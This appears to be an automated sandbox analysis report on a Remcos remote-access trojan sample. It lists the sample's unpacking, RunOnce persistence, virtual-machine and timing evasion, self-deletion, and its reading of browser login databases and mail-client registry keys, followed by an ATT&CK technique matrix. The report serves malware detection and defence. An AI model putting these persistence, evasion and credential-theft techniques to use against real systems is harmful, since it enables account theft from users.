              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\Desktop\LrBF2Z930N.cfgJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: LrBF2Z930N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeUnpacked PE file: 5.2.LrBF2Z930N.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeUnpacked PE file: 6.2.LrBF2Z930N.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeUnpacked PE file: 7.2.LrBF2Z930N.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000000.00000002.3386711398.0000000006CE9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_6E391BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E391BFF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_6E3930C0 push eax; ret 0_2_6E3930EE
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37871219 push esp; iretd 4_2_3787121A
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862806 push ecx; ret 4_2_37862819
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00451D34 push eax; ret 6_2_00451D41
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile created: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\lrbf2z930n.exeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI/Special instruction interceptor: Address: 739EFF8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI/Special instruction interceptor: Address: 5A4EFF8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRDTSC instruction interceptor: First address: 736446B second address: 736446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F30D0B1E6B2h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeRDTSC instruction interceptor: First address: 5A1446B second address: 5A1446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F30D084BD42h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeWindow / User API: threadDelayed 3478Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeWindow / User API: threadDelayed 1653Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeWindow / User API: threadDelayed 3856Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeWindow / User API: foregroundWindowGot 1761Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 356Thread sleep count: 3478 > 30Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 6196Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 2220Thread sleep count: 1653 > 30Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 2220Thread sleep time: -4959000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 2220Thread sleep count: 3856 > 30Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exe TID: 2220Thread sleep time: -11568000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeThread sleep count: Count: 3478 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_378610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_378610F1
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37866580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_37866580
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.AbrJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Local\Temp\nse8209.tmpJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.OveJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\Desktop\LrBF2Z930N.exeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006968000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\P
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI call chain: ExitProcess graph end nodegraph_0-4367
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI call chain: ExitProcess graph end nodegraph_0-4596
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeAPI call chain: ExitProcess graph end nodegraph_6-34112
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_37862639
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_6E391BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E391BFF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37864AB4 mov eax, dword ptr fs:[00000030h]4_2_37864AB4
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_3786724E GetProcessHeap,4_2_3786724E
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_37862B1C
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_37862639
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_378660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_378660E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: NULL target: C:\Users\user\Desktop\LrBF2Z930N.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: NULL target: C:\Users\user\Desktop\LrBF2Z930N.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeSection loaded: NULL target: C:\Users\user\Desktop\LrBF2Z930N.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe "C:\Users\user\Desktop\LrBF2Z930N.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\rldkxktiiyi"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\tgicxdejwgafity"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Users\user\Desktop\LrBF2Z930N.exe C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\einnyvodjoskszmffx"Jump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" Jump to behavior
              Source: LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-PC
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862933 cpuid 4_2_37862933
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37862264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_37862264
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3652191797.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LrBF2Z930N.exe PID: 516, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: LrBF2Z930N.exe PID: 516, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
              Source: Yara matchFile source: 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3652191797.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LrBF2Z930N.exe PID: 516, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts11
              Native API
              11
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Registry Run Keys / Startup Folder
              112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
